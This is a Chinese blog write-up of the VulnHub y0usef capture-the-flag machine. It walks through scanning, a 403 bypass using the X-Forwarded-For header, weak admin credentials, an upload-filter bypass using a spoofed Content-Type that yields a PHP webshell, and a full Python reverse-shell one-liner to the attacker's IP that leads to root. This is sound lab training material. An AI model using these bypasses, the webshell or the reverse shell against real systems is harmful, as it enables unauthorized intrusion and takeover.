vulnhub靶场-y0usef

最新推荐文章于 2023-06-15 17:41:18 发布
最新推荐文章于 2023-06-15 17:41:18 发布
阅读量811 收藏 3
点赞数 1
分类专栏: 网络安全 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42947816/article/details/123332384
版权

1、靶机信息

靶机名称:y0usef

靶机难度:简单

虚拟机环境:此靶机推荐使用Virtualbox搭建

目标:获取两个flag

靶机地址:https://download.vulnhub.com/y0usef/y0usef.ova

kali服务器IP

192.168.137.116

靶机IP

192.168.137.20

2、主机发现

2.1 使用arp协议探测同一C段靶机地址

arp-scan -l

得到靶机IP 192.168.137.20

3、端口扫描

3.1 使用nmap对主机进行全端口探测,以及开放服务的版本探测

nmap -sS -sV -p- -v 192.168.137.20

在这次扫描中,我们发现了22 SSH和80 Apache端口的开放,并且系统为Ubuntu

4、Web信息收集

4.1 首先我们访问站点,站点显示正在建设中,没有什么可利用的价值

4.2 我们访问一下页面源码,也没有发现有价值的东西

4.3 使用whatweb对站点的指纹信息进行收集,识别站点框架、语言等环境

whatweb http://192.168.137.20

我们收集到此站点搭建到Apache 2.4.10,语言为php,Web前端框架为Bootstrap,系统为Ubuntu

4.4 使用dirsearch对站点进行路径爬取

dirsearch -u http://192.168.137.20 -e *

发现一个敏感路径/adminstration/

4.5 尝试访问http://192.168.137.20/adminstration/,发现403 Forbidden,没有权限进行访问

5、403 Bypass

5.1 403 绕过技巧

①覆盖请求URL

尝试使用X-Original-URLX-Rewrite-URL标头绕过Web服务器的限制。通过支持X-Original-URL和X-Rewrite-URL标头,用户可以使用X-Original-URL或X-Rewrite-URL HTTP请求标头覆盖请求URL中的路径,尝试绕过对更高级别的缓存和Web服务器的限制。

②修改Host头

一般情况下,几个网站可能会部署在同一个服务器上,或者几个 web 系统共享一个服务器,通过host头来指定应该由哪个网站或者web系统来处理用户的请求。当服务器获取HOST的方式不当时,我们可以通过修改Host值来进行绕过。首先对该目标域名进行子域名收集,整理好子域名资产(host字段同样支持IP地址),再使用Burp的Intruder功能。

③Refer头绕过

尝试使用Referer标头绕过Web服务器的限制,Referer 请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用 Referer 请求头识别访问来源。

④代理IP

一般开发者会通过Nginx代理识别访问端IP限制对接口的访问,尝试使用 X-Forwarded-ForX-Forwared-Host等标头绕过Web服务器的限制。

5.2 在这里我们使用了代理IP XFF的方式成功绕过,让服务器误以为请求是由本机127.0.0.1发起

可以看到页面是一个登陆页面,说明我们已经成功绕过

5.3 使用浏览器打开页面后,我们尝试对账密进行爆破

最后发现账密为admin/admin,在这里需要提醒一下,在提交账密后,请求中要始终带有XFF字段,否则服务器又会认为客户端没有经过验证

5.4 成功进入站点后台

6、文件上传

6.1 后台可以看到一处明显的上传点

6.2 当我们直接上传一句话木马时,发现文件没有被允许,说明是对文件上传做了一定限制

6.3 我们尝试修改文件类型,对文件扩展名进行修改

修改为Content-Type: image/png

发现文件上传成功,页面显示:file uploadad files/1646209522test.php

6.4 既然已经知道了文件目录,在这里直接命令执行

可以看到ls命令成功执行

GET /adminstration/upload/files/1646209522test.php?cmd=ls

7、提权

7.1 反弹shell

python反弹shell语句:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.116",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

浏览器执行:http://192.168.137.20/adminstration/upload/files/1646209522test.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.137.116%22,9999));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27

7.2 通过在/home目录下找到一个user.txt文件,文本内容为一串Base64编码,解码后得到:

ssh : 
user : yousef 
pass : yousef123

7.3 使用shell软件登陆yousef账户,并尝试切换到root账户,发现成功,意味着提权成功

7.4 我们尝试在/root目录下寻找flag,又发现一串Base64编码,对其进行解码,拿到最终一个flag,打靶结束!

You've got the root Congratulations any feedback content me twitter @y0usef_11

KALC
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【新手向】VulnHub靶场MONEYBOX 1 详细解析,通过五轮面试斩获offer阿里实习生亲述
2401_83739503的博客
04-14 490
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
metadata.angular.js
07-18
元数据.angular.js 基于平台的元数据功能的模块。 版权和许可 This program is available under dual licensing. Copyright (c) 2013 thinkerIT BVBA http://thinkerit.be You can redistribute this program and/or modify it under the terms of the GNU General Public License (GPL) version 3 as published by the Free Software Foundation http://www.gnu.org/copyleft/gpl.html This program is distributed in the hope that it will be usef
realtek sdk编译总结.zip_laughq61_pairfem_realtek sdk_realtek 编译_usef
07-13
如何编译realtek sdk源码.包括交叉编译工具的设置,编译选项如何选择等
Ultranarrow bandwidth tunable atomic filter via quantum interference-induced polarization rotation in Rb vapor
02-05
We report the experimental demonstration of an ultranarrow bandwidth atomic filter by optically induced polarization rotation in multilevel electromagnetically induced transparency systems in hot Rb vapor. With a coupling intensity of 2.3 W/cm2, the filter shows a peak transmission of 33.2% and a bandwidth of 10 MHz. By altering the coupling frequency, a broad tuning range of several Doppler linewidths of the D1 line transitions of 87Rb atoms can be obtained. The presented atomic filter has usef
RGIT-annual-asset-depreciation-App:使用双倍余额递减和年数总和法评估公司资产的年度折旧的应用程序
03-21
RGIT的财务人员希望您开发一个应用程序,该应用程序将使用双倍余额递减和年数总和法评估公司资产的年度折旧。 The Financial officer will enter the asset’s cost, useful life (in years), and salvage value (which is the value of the asset at the end of its useful life). The sample of the application can be seen in Figure 2. The interface provides text boxes for entering the asset cost and salvage value. It also provides a list box for selecting the usef
vulnhub靶场渗透实战(8-y0usef
随心所欲不逾矩
08-30 432
靶场难度:简单环境:Virtualbox搭建结果:拿到两个权限的flag。Virtualbox:192.168.3.2(桥接模式)kali:192.168.3.9(桥接模式)
vulnhub靶机--y0usef(难度:easy)
weixin_46107179的博客
04-20 2107
靶机下载地址:下载链接 主机发现 通过arp-scan -l扫描得到靶机的IP地址为10.0.2.4 信息搜集 通过nmap扫描,可以得到靶机只开启了22,80端口(ssh,Apache服务) 打开浏览器访问,发现这个站点还在建设中,但是服务器在运行中 尝试了robots.txt,发现没有该文件,查看源代码也没有什么发现,于是,再用dirsearch扫描一下目录,发现基本上是403,可能权限不够,访问其他200的响应码发现与开始的主页面一样 但是还有一个adminstration的目录,进行访问,结
VulnHub之y0usef靶场(1)
p_utao的博客
02-08 394
场信息: 地址:https://www.vulnhub.com/entry/y0usef-1,624/ 发布日期:2020年12月10日 难度:简单 目标:user.txt和root.txt 运行:VirtualBox(网络桥接) 信息收集 Web 服务器: Apache 2.4.10 编程语言: PHP 5.5.9 操作系统: Ubuntu nmap扫描一下 nmap 192.168.1.0/24 Nmap scan report for 192.168.1.50 Host is u
Vulnhub靶机实战-Y0USEF-1
黑白的博客
01-10 859
声明 好好学习,天天向上 搭建 Y0USEF: 1,vulnhub官网下载完镜像后,最开始搭建时,导入vmware屡屡出错,改了ovftool,以及各种配置还是无法导入,最后下载Oracle VM Virtrualbox,导入到这个里面,网络设置成桥接网卡,可以正常使用 渗透 存活扫描 nmap -sP 192.168.31.1/24 端口扫描 nmap -T4 -A 192.168.31.232 -p 1-65535 -oN nmap.A 发现开启22和80,看看80的http 访问80,啥都没有
vulnhub靶场,DC-8
kukudeshuo的博客
07-16 485
vulnhub靶场,DC-8 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-8(192.168.58.151) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan -l确定目标靶机 确定目标靶机IP为192.168.58.151 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机80端口 网站目录结构扫描 发现robots.txt文件,访问rob
VulnHub靶场LupinOne
I夜白
02-01 4972
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息收集 信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重
fsf-ft-11-MERN-starter
03-05
npm init -y npm install express mongoose 生成Express应用 需要快递 创建一个Express实例 将服务器端口设置为3001 听PORT 添加中间件 app . use ( express . urlencoded ( { extended : true } ) ) ; app . ...
渗透测试学习笔记lab1【y0usef
铃的杂货铺分铺
09-27 1047
第一周, y0usef靶机的渗透学习笔记
Y0usef打靶记录
wwd180的博客
06-15 250
实验主机:攻击机kali(192.168.3.131)靶机y0usef(192.168.3.99)实验目标:获取root权限 + flag实验网络:桥接。
Y0usef
qq_47078547的博客
06-15 133
实验主机:Os-Y0usef 靶机一台/Kali linux攻击机一台实验网络:桥接网络实验目标:获取靶机的Root权限 得到flag难易程度:简单。
Vulnhub--y0usef
weixin_45168704的博客
06-15 196
y0usef
vulnhub-y0usef
m0_62008601的博客
09-18 388
简单的渗透练习
VulnHub靶场-Tiki
hxync的博客
08-08 910
靶场下载地址:tiki. 下载之后导入virtualbox启动 不能直接看到IP地址 先看一下kali的ip: Nmap扫一下192.168.1.0/24网段的主机,找到了靶机的IP地址 再扫一下靶机开放的端口: 开放了22 80 139 445 这四个端口 浏览器访问80端口没有发现什么有用的东西 Dirbuster扫一下目录 浏览器访问一下扫到的robots.txt 发现robots.txt文件里也有扫到的tiki目录,访问一下 发现提示是tikiwikicms 再加上下载靶场时有提示是cve漏洞
Vulnhub-Narak靶场
Longwaer
12-29 836
Vulnhub中Narak靶场学习,通过笔记全方位细致演示,更快的掌握漏洞复现、各种小技巧等。
Capacity mismatch for disk D:\xuniji\baji\y0usef\\y0usef-disk1.vmdk。
最新发布
04-28
"Capacity mismatch for disk D:\xuniji\baji\y0usef\y0usef-disk1.vmdk" 是一个错误提示,意味着磁盘容量不匹配。这通常发生在虚拟机或虚拟磁盘的配置中。 可能的原因是,虚拟磁盘文件的容量与虚拟机配置中指定的容量不一致。这可能是由于文件被修改、移动或损坏导致的。 要解决这个问题,可以尝试以下步骤: 1. 检查虚拟机配置:确保虚拟机配置中指定的磁盘容量与实际磁盘文件的容量匹配。 2. 检查磁盘文件:确认磁盘文件是否存在、完整且没有被修改。如果文件损坏,可以尝试使用备份文件或重新创建磁盘文件。 3. 调整磁盘容量:如果虚拟机配置中指定的容量不正确,可以尝试调整磁盘容量以匹配实际情况。 请注意,具体的解决方法可能因具体情况而异。如果问题仍然存在,建议参考相关虚拟化平台(如VMware、VirtualBox等)的文档或寻求相关技术支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值